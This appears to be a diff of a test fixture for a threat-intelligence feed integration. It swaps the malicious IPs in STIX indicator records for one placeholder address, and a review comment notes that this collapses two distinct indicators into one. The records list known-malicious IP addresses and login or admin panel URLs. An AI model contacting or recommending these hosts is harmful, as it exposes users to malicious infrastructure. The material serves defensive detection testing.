'89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15118,7 +15118,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 176.107.160.116", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime", "modified": "2020-02-03T01:56:22.888Z", "valid_from": "2020-02-03T01:56:22.888Z", @@ -15140,12 +15140,12 @@ "first_seen": "2020-02-03T01:56:22.888Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "176.107.160.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386476265Z", - "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 176.107.160.116\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.107.160.116']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", + "ingested": "2021-12-13T08:38:40.024322Z", + "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15195,7 +15195,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386481265Z", + "ingested": "2021-12-13T08:38:40.024329Z", "original": "{\"created\":\"2020-02-03T01:56:30.815Z\",\"description\":\"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:56:30.815Z\",\"name\":\"mal_url: http://mine.kommanditgesel.icu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mine.kommanditgesel.icu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:30.815Z\"}", "category": "threat", "type": "indicator", @@ -15247,7 +15247,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386485623Z", + "ingested": "2021-12-13T08:38:40.024336Z", "original": "{\"created\":\"2020-02-03T01:56:31.691Z\",\"description\":\"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:31.691Z\",\"name\":\"mal_url: http://soapstampingmachines.com/slider/data1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:31.691Z\"}", "category": "threat", "type": "indicator", 
@@ -15298,7 +15298,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386489831Z", + "ingested": "2021-12-13T08:38:40.024340Z", "original": "{\"created\":\"2020-02-03T01:56:34.945Z\",\"description\":\"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:34.945Z\",\"name\":\"mal_url: http://jino-stell-jino.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jino-stell-jino.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:34.945Z\"}", "category": "threat", "type": "indicator", @@ -15317,7 +15317,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.58/auth.php", + "name": "mal_url: http://89.160.20.156/auth.php", "description": "TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-03T01:57:32.610Z", "valid_from": "2020-02-03T01:57:32.61Z", 
@@ -15342,16 +15342,16 @@ "url": { "path": "/auth.php", "extension": "php", - "original": "http://5.188.60.58/auth.php", + "original": "http://89.160.20.156/auth.php", "scheme": "http", - "domain": "5.188.60.58", - "full": "http://5.188.60.58/auth.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/auth.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386494199Z", - "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://5.188.60.58/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.58/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", + "ingested": "2021-12-13T08:38:40.024343400Z", + "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15369,7 +15369,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 92.63.197.191", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-03T01:57:46.702Z", "valid_from": "2020-02-03T01:57:46.702Z", @@ -15391,12 +15391,12 @@ "first_seen": "2020-02-03T01:57:46.702Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "92.63.197.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386505090Z", - "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 92.63.197.191\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.191']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", + "ingested": "2021-12-13T08:38:40.024348300Z", + "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15447,7 +15447,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386511892Z", + "ingested": "2021-12-13T08:38:40.024353600Z", "original": "{\"created\":\"2020-02-03T01:58:15.744Z\",\"description\":\"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--336d902d-e5d8-48c1-87be-c4f506274d34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-03T01:58:15.744Z\",\"name\":\"mal_url: http://hypercleaner.su/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hypercleaner.su/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:15.744Z\"}", "category": "threat", "type": "indicator", @@ -15499,7 +15499,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386517453Z", + "ingested": "2021-12-13T08:38:40.024359600Z", "original": "{\"created\":\"2020-02-03T01:58:28.73Z\",\"description\":\"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-03T01:58:28.73Z\",\"name\":\"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:28.73Z\"}", "category": "threat", "type": "indicator", 
@@ -15551,7 +15551,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386522372Z", + "ingested": "2021-12-13T08:38:40.024363400Z", "original": "{\"created\":\"2020-02-03T01:59:18.132Z\",\"description\":\"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime\",\"id\":\"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-03T01:59:18.132Z\",\"name\":\"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:18.132Z\"}", "category": "threat", "type": "indicator", @@ -15570,7 +15570,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.59/auth.php", + "name": "mal_url: http://89.160.20.156/auth.php", "description": "TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-03T01:59:28.343Z", "valid_from": "2020-02-03T01:59:28.343Z", 
@@ -15595,16 +15595,16 @@ "url": { "path": "/auth.php", "extension": "php", - "original": "http://5.188.60.59/auth.php", + "original": "http://89.160.20.156/auth.php", "scheme": "http", - "domain": "5.188.60.59", - "full": "http://5.188.60.59/auth.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/auth.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386527532Z", - "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://5.188.60.59/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.59/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", + "ingested": "2021-12-13T08:38:40.024368600Z", + "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
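Review bot: After this change the `url.full` / `pattern` value `http://89.160.20.156/auth.php` is identical to the one produced by the `-15342` hunk, so the fixture now holds two STIX indicators (`indicator--ba8f8e26-…` and `indicator--a6588ee7-…`) with the same URL value but different ids, whereas before they pointed at 5.188.60.58 and 5.188.60.59. If the pipeline or any downstream step deduplicates or fingerprints on the indicator value, this expected output can no longer tell apart two events from one, and it silently drops the "two hosts, same path" case the original feed data exercised. Varying the path (e.g. `/auth.php` vs `/login.php`) or the address in the input events, then regenerating, would keep the two indicators distinct; I am inferring the input/expected relationship from the `ingested` timestamp churn, so confirm which file is hand-maintained.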
@@ -15655,7 +15655,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386532050Z", + "ingested": "2021-12-13T08:38:40.024373300Z", "original": "{\"created\":\"2020-02-03T01:59:33.587Z\",\"description\":\"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-03T01:59:33.587Z\",\"name\":\"mal_url: http://anorelier.hk/fshblfn8071/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:33.587Z\"}", "category": "threat", "type": "indicator", @@ -15707,7 +15707,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386536569Z", + "ingested": "2021-12-13T08:38:40.024377500Z", "original": "{\"created\":\"2020-02-03T01:59:54.52Z\",\"description\":\"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f33dd90a-b849-42af-9bcb-f60476358305\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-03T01:59:54.52Z\",\"name\":\"mal_url: http://bendetta.online/mangooste/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bendetta.online/mangooste/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.52Z\"}", "category": "threat", "type": "indicator", 
@@ -15759,7 +15759,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386540877Z", + "ingested": "2021-12-13T08:38:40.024385200Z", "original": "{\"created\":\"2020-02-03T01:59:54.544Z\",\"description\":\"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--27f2f598-95d6-4e35-a42e-240093d4452d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:59:54.544Z\",\"name\":\"mal_url: http://kayfundz.ru/kay/eng/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.544Z\"}", "category": "threat", "type": "indicator", @@ -15811,7 +15811,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386545556Z", + "ingested": "2021-12-13T08:38:40.024391Z", "original": "{\"created\":\"2020-02-05T01:58:09.73Z\",\"description\":\"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--65a8989b-25c3-498e-8247-0514d5aa719e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-05T01:58:09.73Z\",\"name\":\"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:09.73Z\"}", "category": "threat", "type": "indicator", 
@@ -15830,7 +15830,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.7/hoist3/logs/omc.php", + "name": "mal_url: http://89.160.20.156/hoist3/logs/omc.php", "description": "TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-05T01:58:17.365Z", "valid_from": "2020-02-05T01:58:17.365Z", 
@@ -15855,16 +15855,16 @@ "url": { "path": "/hoist3/logs/omc.php", "extension": "php", - "original": "http://193.142.59.7/hoist3/logs/omc.php", + "original": "http://89.160.20.156/hoist3/logs/omc.php", "scheme": "http", - "domain": "193.142.59.7", - "full": "http://193.142.59.7/hoist3/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/hoist3/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386549793Z", - "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://193.142.59.7/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", + "ingested": "2021-12-13T08:38:40.024398500Z", + "original": "{\"created\":\"2020-02-05T01:58:17.365Z\",\"description\":\"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-05T01:58:17.365Z\",\"name\":\"mal_url: http://89.160.20.156/hoist3/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.365Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15882,7 +15882,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 46.29.161.60", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime", "modified": "2020-02-05T01:58:17.428Z", "valid_from": "2020-02-05T01:58:17.428Z", @@ -15904,12 +15904,12 @@ "first_seen": "2020-02-05T01:58:17.428Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "46.29.161.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386554212Z", - "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 46.29.161.60\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '46.29.161.60']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", + "ingested": "2021-12-13T08:38:40.024405700Z", + "original": "{\"created\":\"2020-02-05T01:58:17.428Z\",\"description\":\"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--7aed3145-aab6-470d-bb4f-592d86654719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-02-05T01:58:17.428Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:17.428Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15960,7 +15960,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386558530Z", + "ingested": "2021-12-13T08:38:40.024411500Z", "original": "{\"created\":\"2020-02-05T01:58:31.683Z\",\"description\":\"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T01:58:31.683Z\",\"name\":\"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.683Z\"}", "category": "threat", "type": "indicator", @@ -15979,7 +15979,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.160.59.64/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime", "modified": "2020-02-05T01:58:31.704Z", "valid_from": "2020-02-05T01:58:31.704Z", 
@@ -16004,16 +16004,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://217.160.59.64/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "217.160.59.64", - "full": "http://217.160.59.64/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386562868Z", - "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://217.160.59.64/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.160.59.64/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", + "ingested": "2021-12-13T08:38:40.024418600Z", + "original": "{\"created\":\"2020-02-05T01:58:31.704Z\",\"description\":\"TS ID: 55287965557; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--59c28566-62b0-4102-ad17-53ec3a143144\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-05T01:58:31.704Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:31.704Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16031,7 +16031,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "name": "mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "description": "TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime", "modified": "2020-02-05T01:58:32.111Z", "valid_from": "2020-02-05T01:58:32.111Z", 
@@ -16056,16 +16056,16 @@ "url": { "path": "/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "extension": "php", - "original": "http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "original": "http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php", "scheme": "http", - "domain": "104.223.170.113", - "full": "http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386567236Z", - "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", + "ingested": "2021-12-13T08:38:40.024425500Z", + "original": "{\"created\":\"2020-02-05T01:58:32.111Z\",\"description\":\"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:32.111Z\",\"name\":\"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 
